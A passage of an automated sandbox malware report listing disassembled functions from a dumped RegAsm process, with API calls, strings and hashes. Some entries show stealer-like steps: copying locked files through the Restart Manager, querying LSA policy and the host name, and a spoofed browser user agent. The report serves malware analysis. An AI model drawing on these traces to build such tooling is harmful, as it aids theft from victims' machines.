HeapAlloc.KERNEL32(00000000), ref: 004EEB71
lstrcpynA.KERNEL32(00000000,?,?), ref: 004EEB7E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004EEBA9
HeapFree.KERNEL32(00000000), ref: 004EEBAC

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36, xrefs: 004EEB8E

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Heap$CharNext$Process$AllocFreeUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpynlstrlen
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36
API String ID: 2305228968-2732702261
Opcode ID: 423986ca5e1177f672ef3d58246459128f5a16203a5f76b509fb2a383bcfa813
Instruction ID: 66e08b66e62082d9c79a605ab5b022e87f42821b87c70d6f65fc34b32a61c15c
Opcode Fuzzy Hash: 423986ca5e1177f672ef3d58246459128f5a16203a5f76b509fb2a383bcfa813
Instruction Fuzzy Hash: F1414976D003449FCF10CFAB9C80AAABBB5FF69302B08016BEA05B7351E7755D059B64

Function 004579E3 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0045734F), ref: 004579FC

Strings

log10, xrefs: 00457A3E, 00457A4D
exp, xrefs: 00457A7B, 00457AE0
acos, xrefs: 00457B32
log, xrefs: 00457A59, 00457A68
`-@, xrefs: 00457AC6, 00457B70, 00457BB6
pow, xrefs: 00457A9A, 00457B44, 00457B91
asin, xrefs: 00457B29
sqrt, xrefs: 00457B3B

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: DecodePointer
String ID: `-@$acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3628989360
Opcode ID: 4c17630f5161de399ffce6b570c60365a2c89c55b52a7f760b39540bf94f5387
Instruction ID: bbf143f63b3841ec77cfacb8c6df481a799db6acf17f433172942b25d65e7ef2
Opcode Fuzzy Hash: 4c17630f5161de399ffce6b570c60365a2c89c55b52a7f760b39540bf94f5387
Instruction Fuzzy Hash: 1651B370808A0ACBCF109F58F84C1BEBFB1FB05309F154166D851A7266C7799A2DCB4D

Function 0041A060 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 136COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041A09D
std::_Lockit::_Lockit.LIBCPMT ref: 0041A0BF
std::_Lockit::~_Lockit.LIBCPMT ref: 0041A0E7
__Getctype.LIBCPMT ref: 0041A1C5
std::_Facet_Register.LIBCPMT ref: 0041A1F9
std::_Lockit::~_Lockit.LIBCPMT ref: 0041A223

Strings

PG@, xrefs: 0041A1BF
PD@, xrefs: 0041A19A
E@, xrefs: 0041A1AE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: PD@$PG@$E@
API String ID: 1102183713-4120405683
Opcode ID: 495f4126c8959cda1dad90c343e93fba20469dde2e2043d742b69906c970156d
Instruction ID: b372b58ab1bb25eec4b44a09b7f8f3aef2cc67a410616163416d5e42c3dffe19
Opcode Fuzzy Hash: 495f4126c8959cda1dad90c343e93fba20469dde2e2043d742b69906c970156d
Instruction Fuzzy Hash: 6E51BAB0D01245DFCB11CF98C9457AEBBF0FB14714F14825ED855AB391DB78AA88CB92

Function 004E5DB0 Relevance: 15.2, APIs: 10, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,0000001C), ref: 004E5E2B
SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,00000000), ref: 004E5E3E
LocalAlloc.KERNEL32(00000040,0000001C), ref: 004E5E73
SetupDiEnumDeviceInterfaces.SETUPAPI(?,00000000,0055D560,00000000,00000000), ref: 004E5E91
GetModuleHandleExA.KERNEL32(00000004,004E5FC0,?), ref: 004E5FD6

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AllocDeviceEnumLocalSetup$HandleInfoInterfacesModule
String ID:
API String ID: 2253831631-0
Opcode ID: a98dc671e0e2502dd0d28a77b20db96fd6bcd1f3e96885c3382b0a93b103deca
Instruction ID: 9ece1d8e53d7ac8d60b2bb6ddbf2ef81f89b1d867ae8a09947e2396971ddc2c4
Opcode Fuzzy Hash: a98dc671e0e2502dd0d28a77b20db96fd6bcd1f3e96885c3382b0a93b103deca
Instruction Fuzzy Hash: AB61BCB1900349AFEB10CFA5CD09BAEBFB5FF14305F24025AE90067291D3B96A44DBA5

Function 004D6BA0 Relevance: 15.2, APIs: 10, Instructions: 164fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000), ref: 004D6BD3
RmStartSession.RSTRTMGR(?,00000000,?), ref: 004D6C50
RmRegisterResources.RSTRTMGR(?,00000001,?,00000000,00000000,00000000,00000000,?), ref: 004D6C91
RmGetList.RSTRTMGR(?,00000000,?,?,?), ref: 004D6CB9
RmShutdown.RSTRTMGR(?,00000001,00000000), ref: 004D6CDA
RmEndSession.RSTRTMGR(?), ref: 004D6CF7
SetLastError.KERNEL32(00000000), ref: 004D6CFE
CopyFileA.KERNEL32(?,?,00000000), ref: 004D6D25
GetLastError.KERNEL32(?,?,00000000), ref: 004D6D33
CopyFileA.KERNEL32(?,?,00000000), ref: 004D6D47

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CopyFileSession$ListRegisterResourcesShutdownStart
String ID:
API String ID: 304452573-0
Opcode ID: f2e0f649d8c451cb188e662d2111ed80fd4b92e16dc5a70a42fc26eb44908162
Instruction ID: cca443e56f4e81c83c2dc89493b37bcb85ee1d7da0cfa031959f485395bd6110
Opcode Fuzzy Hash: f2e0f649d8c451cb188e662d2111ed80fd4b92e16dc5a70a42fc26eb44908162
Instruction Fuzzy Hash: 6051C172D01219ABCB21CF94DC55BEEBBB8EB04320F10026AE804B3390D7396E05CBA4

Function 004377C6 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

___TypeMatch.LIBVCRUNTIME ref: 004379F3
CatchIt.LIBVCRUNTIME ref: 00437A44
_UnwindNestedFrames.LIBCMT ref: 00437B45
CallUnexpected.LIBVCRUNTIME ref: 00437B60

Strings

csm, xrefs: 0043791C
PU, xrefs: 004378DC
csm, xrefs: 00437803
csm, xrefs: 00437870

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwind
String ID: PU$csm$csm$csm
API String ID: 944608866-2352073648
Opcode ID: bfdbdb9048f87fb98bf27686f7ec8788dee97e91e92dadc6c49aef564bf08e9e
Instruction ID: 3ab07074fa5cec17866f911e521d745307128fc3ecc03719d0b843171535b798
Opcode Fuzzy Hash: bfdbdb9048f87fb98bf27686f7ec8788dee97e91e92dadc6c49aef564bf08e9e
Instruction Fuzzy Hash: 2DB18EB1808209DFDF25EFA5C8819AEBB75FF18314F14615BE8406B302D739EA51CB99

Function 004E4720 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 291registryCOMMON

Download Yara Rule

APIs

RegGetValueA.ADVAPI32(80000002,?,?,0001FFFF,00000001,?,00000104,?,?,?), ref: 004E4A70
GetComputerNameExA.KERNEL32(00000002,?,00000104,?,?,?,?,?,?), ref: 004E4ADC
LsaOpenPolicy.ADVAPI32(00000000,00587684,00000001,?), ref: 004E4B35
LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 004E4B48
LsaFreeMemory.ADVAPI32(?), ref: 004E4B76
LsaClose.ADVAPI32(?), ref: 004E4B7F

Strings

;Yb., xrefs: 004E49C7
%wZ, xrefs: 004E4B65

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: Policy$CloseComputerFreeInformationMemoryNameOpenQueryValue
String ID: %wZ$;Yb.
API String ID: 762890658-2876608990
Opcode ID: 1f6fa3f1279af543b2d0416b495f84695c810df1c81b970ccc0f6ebddc05bc25
Instruction ID: db120a3af714b361d6db134a28a940fef9e0d4b71911d12d67c4190411436b99
Opcode Fuzzy Hash: 1f6fa3f1279af543b2d0416b495f84695c810df1c81b970ccc0f6ebddc05bc25
Instruction Fuzzy Hash: 1EE101B4D0425A8FDB14CF98C985BEEBBB4BF08304F2041AAE949B7341D7745A85CFA5

Function 004372D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00437307
___except_validate_context_record.LIBVCRUNTIME ref: 0043730F
_ValidateLocalCookies.LIBCMT ref: 00437398
__IsNonwritableInCurrentImage.LIBCMT ref: 004373C3
_ValidateLocalCookies.LIBCMT ref: 00437418

Strings

`-@, xrefs: 004373DC
csm, xrefs: 004373AD
]=_I, xrefs: 00437382, 004373FF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ]=_I$`-@$csm
API String ID: 1170836740-826715726
Opcode ID: a837c65dc98bc53f7a591b5dada66322cfdf011b0ab20b220170fbbfaeea83fd
Instruction ID: bde692452db8eba3752ab90a3e7788ac0719a0bf92b2230e47b89eff8dfd02fd
Opcode Fuzzy Hash: a837c65dc98bc53f7a591b5dada66322cfdf011b0ab20b220170fbbfaeea83fd
Instruction Fuzzy Hash: B041F8709042099FCF20DF59C885A9FBBA4BF08328F14905BFC54AB392D739E905DB95

Function 0041D260 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041D28A
std::_Lockit::_Lockit.LIBCPMT ref: 0041D2AC
std::_Lockit::~_Lockit.LIBCPMT ref: 0041D2D4
__Getcoll.LIBCPMT ref: 0041D39F
std::_Facet_Register.LIBCPMT ref: 0041D3E4
std::_Lockit::~_Lockit.LIBCPMT ref: 0041D40E

Strings

@A, xrefs: 0041D399
PD@, xrefs: 0041D385

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID: @A$PD@
API String ID: 1184649410-3602166583
Opcode ID: 0bf225a75eb93bfa089e9f157e46b85744d7a7315d20ca7401f03ce5cc574cac
Instruction ID: c0da35fc40401e56e1a2e1b6a9e91288cb6dff343535c30909133d457a6d594b
Opcode Fuzzy Hash: 0bf225a75eb93bfa089e9f157e46b85744d7a7315d20ca7401f03ce5cc574cac
Instruction Fuzzy Hash: DD51BAB1C01209DFDB01DF99C9447AEBBF0FF55318F24805AE8156B381C779AA49CB92

Function 00544CF0 Relevance: 13.6, APIs: 9, Instructions: 88sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00545330: GetVersionExA.KERNEL32(?), ref: 00545356

GetVersionExA.KERNEL32(?), ref: 00544D33
DeleteFileW.KERNEL32(00000000), ref: 00544D52
GetFileAttributesW.KERNEL32(00000000), ref: 00544D59
GetLastError.KERNEL32 ref: 00544D66
Sleep.KERNEL32(00000064), ref: 00544D7C
DeleteFileA.KERNEL32(00000000), ref: 00544D85
GetFileAttributesA.KERNEL32(00000000), ref: 00544D8C
GetLastError.KERNEL32 ref: 00544D99
Sleep.KERNEL32(00000064), ref: 00544DAF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: File$AttributesDeleteErrorLastSleepVersion
String ID:
API String ID: 1421123951-0
Opcode ID: 644f3411c4d85681ded29085f2f8665f8d90dbdf3f2b9961fa3a9f7b4629f182
Instruction ID: e8ec0c6fce3b273d326ef0f9b2b3730986ab63f4275b785bb0a08d323dc610f1
Opcode Fuzzy Hash: 644f3411c4d85681ded29085f2f8665f8d90dbdf3f2b9961fa3a9f7b4629f182
Instruction Fuzzy Hash: 6221DB32D403149FCB20AB74AC8D6FD7BB4FB69339F100655E91AD31A0EA304985AB52

Function 00455EBC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00455F62
__freea.LIBCMT ref: 004560F7
__freea.LIBCMT ref: 004560FD
__freea.LIBCMT ref: 00456133
__freea.LIBCMT ref: 00456139
__freea.LIBCMT ref: 00456149

Strings

]=_I, xrefs: 00455EC4

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: __freea$Info
String ID: ]=_I
API String ID: 541289543-112444943
Opcode ID: 77a1a171c86ef3fa6096f7a709ae2ed72512db26ef43669067fc0c127925550e
Instruction ID: 72db6a5fbbb72ca24a21522075f010f93cbc1b36e5ad4b1d6eb8cbe60aa301df
Opcode Fuzzy Hash: 77a1a171c86ef3fa6096f7a709ae2ed72512db26ef43669067fc0c127925550e
Instruction Fuzzy Hash: D1711572900A05ABDF209F648C51BBFB7B69F49316F66015BED04A7383E63CDC098799

Function 00433369 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 004333F4
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00433480
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004334EB
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00433507
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043356A
CompareStringEx.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00433587

Strings

]=_I, xrefs: 0043336F

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiWide$CompareInfoString
String ID: ]=_I
API String ID: 2984826149-112444943
Opcode ID: 4a3eeb56bd7ee9fe1909d18e68262bb2fe5fda54b12eb40b7425b1e554b148b6
Instruction ID: 4b04ae3b393bc6533ba77a97e4ab0e5e3051f7f3fd8f9b1f1052972f8d3aefbf
Opcode Fuzzy Hash: 4a3eeb56bd7ee9fe1909d18e68262bb2fe5fda54b12eb40b7425b1e554b148b6
Instruction Fuzzy Hash: 8871C272D00215ABEF219F64CC45BEF7BB5AF1D726F14205BE850A7291D73C9E048BA8

Function 004330A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 004330F2
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0043315D
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043317A
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004331B9
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00433218
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0043323B

Strings

]=_I, xrefs: 004330AF

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID: ]=_I
API String ID: 2829165498-112444943
Opcode ID: 5f4a82ba7d014fa06e8216ae2bfd85b34b40225c1761d69da73e76adef6768e6
Instruction ID: 2e7ff44e5bd3fd254f9cef1b25620d319a510a0ee994d159d64b8617f2502457
Opcode Fuzzy Hash: 5f4a82ba7d014fa06e8216ae2bfd85b34b40225c1761d69da73e76adef6768e6
Instruction Fuzzy Hash: 5E51E172500206ABEF205F65CC45FAB7BB9EF48B46F24456AF910D6250D738CE00DB68

Function 0041C430 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0041C45A
std::_Lockit::_Lockit.LIBCPMT ref: 0041C47C
std::_Lockit::~_Lockit.LIBCPMT ref: 0041C4A4
std::_Facet_Register.LIBCPMT ref: 0041C59A
std::_Lockit::~_Lockit.LIBCPMT ref: 0041C5C4

Strings

PD@, xrefs: 0041C54E
E@, xrefs: 0041C562

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: E@$PD@
API String ID: 459529453-4103272508
Opcode ID: fb94b052f71f665722219136562a8730e5ed9d67761b2a33bc821d4977d05291
Instruction ID: e4bc83ced0ac359faa997fd18d4eeb760fe14de2594101695cc0fd15b6690fbc
Opcode Fuzzy Hash: fb94b052f71f665722219136562a8730e5ed9d67761b2a33bc821d4977d05291
Instruction Fuzzy Hash: C351EFB0900255EFDB11CF58C991BAEBBF0FB10314F24415EE846AB381D7B9AA45CB95

Function 00443633 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,495F3D5D,?,?,00000000,00551365,000000FF,?,0044360F,?,?,004435E3,00000016), ref: 00443668
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044367A
FreeLibrary.KERNEL32(00000000,?,00000000,00551365,000000FF,?,0044360F,?,?,004435E3,00000016), ref: 0044369C

Strings

mscoree.dll, xrefs: 00443661
`-@, xrefs: 0044368B
]=_I, xrefs: 00443648
CorExitProcess, xrefs: 00443672

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$]=_I$`-@$mscoree.dll
API String ID: 4061214504-575192129
Opcode ID: 66c557226bdf84cfe892202a4e2d9d598a1facfa92736b92f61228ad13b2a6bb
Instruction ID: 11f561727bfec435161e86ab51d2faaed74d5e09c0b89d0474703e999051cdf2
Opcode Fuzzy Hash: 66c557226bdf84cfe892202a4e2d9d598a1facfa92736b92f61228ad13b2a6bb
Instruction Fuzzy Hash: 5601A232A44715AFDB219F44DC19BAFBBB8FB14B52F014526E812E27E0DB749A04CA94

Function 004EDED0 Relevance: 12.2, APIs: 8, Instructions: 165networkCOMMON

Download Yara Rule

APIs

InternetSetOptionA.WININET(00000000,00000006,?,00000004), ref: 004EDF20
GetLastError.KERNEL32 ref: 004EE015
InternetQueryOptionA.WININET(00000000,0000001F,80000000,?), ref: 004EE040

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: InternetOption$ErrorLastQuery
String ID:
API String ID: 3980908186-0
Opcode ID: a1ac1e88c949714abb61e8a63101dbc767da60d4252146e236756bc9d4aa2743
Instruction ID: 9490229386b8f910ac67b310a4b2a15fa60c532261df57d9535cab47ed46c7f4
Opcode Fuzzy Hash: a1ac1e88c949714abb61e8a63101dbc767da60d4252146e236756bc9d4aa2743
Instruction Fuzzy Hash: B951BE75D40319ABEB20CF95DC8ABEEBBB4EB08B11F14415AEE11BB380D7745A05CB94

Function 00545560 Relevance: 12.1, APIs: 8, Instructions: 141filesleepCOMMON

Download Yara Rule

APIs

LockFile.KERNEL32(00000000,40000000,00000000,00000001,00000000), ref: 005455C3
Sleep.KERNEL32(00000001), ref: 005455D1
GetLastError.KERNEL32 ref: 005455E8
UnlockFile.KERNEL32(00000000,40000000,00000000,?,00000000), ref: 00545633

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: File$ErrorLastLockSleepUnlock
String ID:
API String ID: 3015003838-0
Opcode ID: fe5b5dd74c13ed604590905c3a68f9743d06f085f038e564466f01a9403e7b73
Instruction ID: 85acfabea7dd4ab1116a46d77ec5fdacabbf57290cd153e1b380d28a3a3316b2
Opcode Fuzzy Hash: fe5b5dd74c13ed604590905c3a68f9743d06f085f038e564466f01a9403e7b73
Instruction Fuzzy Hash: 9741D431B01B14ABDB308F24DD957EEBB66FB54729F618125ED08AB392E7719C408BD0

Function 004EDB30 Relevance: 12.1, APIs: 8, Instructions: 128memorystringCOMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 004EDB55
CharNextA.USER32 ref: 004EDB6C
CharNextA.USER32 ref: 004EDB85
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004EDBB6
lstrlenA.KERNEL32(?,00000000,00000000,00000003,00000000), ref: 004EDC32
GetProcessHeap.KERNEL32(00000008,?,00000000,00000000,00000003,00000000), ref: 004EDC48
HeapAlloc.KERNEL32(00000000), ref: 004EDC4F
lstrcpynA.KERNEL32(00000000,?,?), ref: 004EDC5C

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: CharNext$Heap$AllocProcessUnothrow_t@std@@@__ehfuncinfo$??2@lstrcpynlstrlen
String ID:
API String ID: 1659885099-0
Opcode ID: 5902d60186420a28bcfe0593f279e262339d39e86a68ea558966eb630272322d
Instruction ID: 9156e0b6da00d8c97823f7767c754a9362769a51dfd7e715744df6f0419fd9af
Opcode Fuzzy Hash: 5902d60186420a28bcfe0593f279e262339d39e86a68ea558966eb630272322d
Instruction Fuzzy Hash: 9C416A35D007849FCB208F6E9C806AABBF9EF69312B150197E845F7311E7B49C45DB58

Function 0044520B Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 370COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00445385
__freea.LIBCMT ref: 004453A1

Strings

]=_I, xrefs: 00445213
9WD, xrefs: 004455E4
am/pm, xrefs: 00445403
a/p, xrefs: 00445467

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: __freea
String ID: 9WD$]=_I$a/p$am/pm
API String ID: 240046367-1381909275
Opcode ID: 993a7c91ebcf40b0d6cc240ac8cd178338771267cd0baed5445ca37e2b719f32
Instruction ID: eb6553218dede8ec3b22f7d8591de804fd90c34fa4c0505c2e4821a80c18f7d5
Opcode Fuzzy Hash: 993a7c91ebcf40b0d6cc240ac8cd178338771267cd0baed5445ca37e2b719f32
Instruction Fuzzy Hash: 6BC1EC31900A06EBEF249F68C895ABFB7B1FF05700F55404BE805AB356D3789D42CB9A

Function 0044BB66 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044BBEC

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 785c90e8ff89e0f1a3d98e37725974d6f6ea20f06d45e48120c47f1ca5a82ffe
Instruction ID: d7b9d7273cbfac5d15a556f8c8651b9033d93685d5a38535419dded3191b9e75
Opcode Fuzzy Hash: 785c90e8ff89e0f1a3d98e37725974d6f6ea20f06d45e48120c47f1ca5a82ffe
Instruction Fuzzy Hash: D5B14672D006559FEB158F24CC81BEBBBA5EF59310F2441ABE904AB382D778D901C7E9

Function 00432BC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00432BDC
AcquireSRWLockExclusive.KERNEL32(00000008), ref: 00432BFB
AcquireSRWLockExclusive.KERNEL32(00000008,00000000), ref: 00432C29
TryAcquireSRWLockExclusive.KERNEL32(00000008,00000000), ref: 00432C84
TryAcquireSRWLockExclusive.KERNEL32(00000008,00000000), ref: 00432C9B

Strings

]=_I, xrefs: 00432BCE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID: ]=_I
API String ID: 66001078-112444943
Opcode ID: 8f089e7040faa662b45679f060ee1b8a0f0adfff173fd46cb89089840a213128
Instruction ID: ee0d2db44a198d3d02c1eb3b1b0ff5a364ec90963e300245c4d31640e9e12550
Opcode Fuzzy Hash: 8f089e7040faa662b45679f060ee1b8a0f0adfff173fd46cb89089840a213128
Instruction Fuzzy Hash: B2415931900A0ADFCB20DF65CA8096EB3B4FF0C311F20692BD446D7650D7B8E986DB69

Function 005447E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 005447EB
GetVersionExA.KERNEL32(?), ref: 00544810
FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00544843
LocalFree.KERNEL32(?), ref: 0054485A
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00544893

Part of subcall function 00545B50: AreFileApisANSI.KERNEL32(00000000,00000000,?,?,?,005448A5), ref: 00545B5C
Part of subcall function 00545B50: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,?,?,?,005448A5), ref: 00545B71
Part of subcall function 00545B50: MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00545B97

Strings

OsError 0x%x (%u), xrefs: 005448AE

Memory Dump Source

Source File: 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd

Similarity

API ID: ByteCharFormatMessageMultiWide$ApisErrorFileFreeLastLocalVersion
String ID: OsError 0x%x (%u)
API String ID: 807219750-2664311388
Opcode ID: dd207c85fc94544383a517e30f756156e384ee2b8bcde9e9a95a45159a38d464
Instruction ID: 0c2bef24f6b7c7166f87ec92302cb7117f3d967c30a7bda74ece9fcd541a0daa
Opcode Fuzzy Hash: dd207c85fc94544383a517e30f756156e384ee2b8bcde9e9a95a45159a38d464
Instruction Fuzzy Hash: 0D21C832A40208BBEB209F71DC4AFEE7F78FF94755F1000A9F909A2191E7709A05DB61

Function 0044B37E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

